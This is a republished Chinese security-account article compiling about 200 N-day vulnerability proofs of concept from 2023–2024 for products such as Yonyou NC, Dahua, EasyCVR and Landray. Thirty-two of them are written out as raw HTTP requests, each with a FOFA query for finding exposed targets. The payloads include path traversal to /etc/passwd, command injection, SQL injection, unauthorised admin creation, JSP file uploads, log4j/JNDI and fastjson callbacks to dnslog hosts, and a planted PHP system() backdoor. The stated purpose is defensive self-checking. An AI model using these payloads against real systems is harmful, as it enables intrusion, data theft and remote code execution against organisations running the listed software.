Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises; we hope this article helps with your defence. Defenders can use its contents to check their own exposure.

Sources: the article covers 203 POCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: all vulnerabilities are public; for patches or remediation, contact the product vendor.

Content: owing to length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if needed.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Notice

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the most complete version; when using it, press F12 and search for keywords.
Bookmark this article if you need it, or follow this public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor system static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS collaboration platform api.aspx arbitrary file upload
11. Landray EIS collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi-Anxin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi-Anxin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
121. Beijing Byzoro Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Byzoro Smart s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan 建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass (template injection)
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. Ruiyou 天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
POC list

02
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor system static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace the password value with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin panel with the default account admin, then send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step two: a POST request that plants a function which executes the base64-decoded header value.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step three: send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
  "loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://DNSLOG"}
  }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

